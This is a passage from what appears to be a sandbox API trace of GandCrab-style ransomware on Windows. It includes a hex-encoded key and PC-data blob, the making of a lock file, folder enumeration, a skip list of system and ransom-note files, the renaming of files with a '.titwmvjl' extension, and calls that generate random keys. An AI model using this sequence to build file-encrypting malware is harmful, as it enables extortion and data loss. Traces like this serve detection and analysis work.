67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0090.133] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0090.134] CloseHandle (hObject=0x2cc) returned 1 [0090.135] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.135] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.135] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x1bb)) [0090.135] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.135] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.135] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.135] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock") returned 121 [0090.136] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0090.138] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.138] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\") returned 97 [0090.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\*" [0090.138] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5036f8 [0090.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.138] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.138] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.138] lstrcmpW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2=".") returned 1 [0090.138] lstrcmpW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="..") returned 1 [0090.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="cJVF42pEm2_iaxQ8x.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv" [0090.138] lstrlenW (lpString=".titwmvjl") returned 9 [0090.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned 118 [0090.139] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.139] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv.titwmvjl") returned 127 [0090.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned 118 [0090.139] lstrlenW (lpString=".csv") returned 4 [0090.139] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.139] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".csv ") returned 5 [0090.139] lstrcmpiW (lpString1=".csv", lpString2=".titwmvjl") returned -1 [0090.139] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned 118 [0090.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned 118 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="desktop.ini") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="autorun.inf") returned 1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="ntuser.dat") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="iconcache.db") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="bootsect.bak") returned 1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="boot.ini") returned 1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="ntuser.dat.log") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="thumbs.db") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="KRAB-DECRYPT.html") returned -1 [0090.139] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="CRAB-DECRYPT.html") returned -1 [0090.140] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.140] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.140] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="ntldr") returned -1 [0090.140] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="NTDETECT.COM") returned -1 [0090.140] lstrcmpiW (lpString1="cJVF42pEm2_iaxQ8x.csv", lpString2="Bootfont.bin") returned 1 [0090.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv") returned 118 [0090.140] lstrlenW (lpString=".csv") returned 4 [0090.140] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.140] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".csv ") returned 5 [0090.140] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.140] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.140] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\cJVF42pEm2_iaxQ8x.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\cjvf42pem2_iaxq8x.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0090.141] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.141] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0090.141] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.141] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.141] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.142] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.143] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.143] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.143] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0090.143] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.143] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.143] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.143] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.143] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.144] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.145] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.145] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.145] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0090.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.145] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.145] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.145] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: 